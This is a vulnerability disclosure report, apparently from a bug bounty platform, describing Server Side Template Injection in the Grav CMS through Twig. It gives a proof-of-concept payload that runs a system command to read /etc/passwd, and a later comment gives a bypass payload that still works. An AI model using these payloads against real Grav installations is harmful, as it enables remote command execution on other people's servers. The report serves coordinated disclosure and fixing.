Server Side Template Injection in getgrav/grav
Valid
Reported on
Apr 7th 2022
Description
Grav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.
Proof of Concept
Payload:
{{['cat\x20/etc/passwd']|filter('system')}}
- With an authenticated user, access the admin panel.
- Edit a page, enabling Twig in the
Advancedtab. - Put the payload in the content.
- Save and check out the post.
Impact
Remote Command execution
Occurrences
References
We are processing your report and will contact the
getgrav/grav
team within 24 hours.
a year ago
Renan Rocha modified the report
a year ago
We have contacted a member of the
getgrav/grav
team and are waiting to hear back
a year ago
We have sent a
follow up to the
getgrav/grav
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
getgrav/grav
team.
We will try again in 10 days.
a year ago
We have sent a
third and final
follow up to the
getgrav/grav
team.
This report is now considered stale.
a year ago
This issue has been fixed, but we're waiting for a release before going public.
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7
We have sent a
fix follow up to the
getgrav/grav
team.
We will try again in 7 days.
a year ago
We have sent a
second
fix follow up to the
getgrav/grav
team.
We will try again in 10 days.
a year ago
Twig.php#L164-L210
has been validated
ng`bthg
commented
10 months ago
It is still vulnerable with the payload:
{{['cat$IFS/etc/passwd']|map('system')|join}}
to join this conversation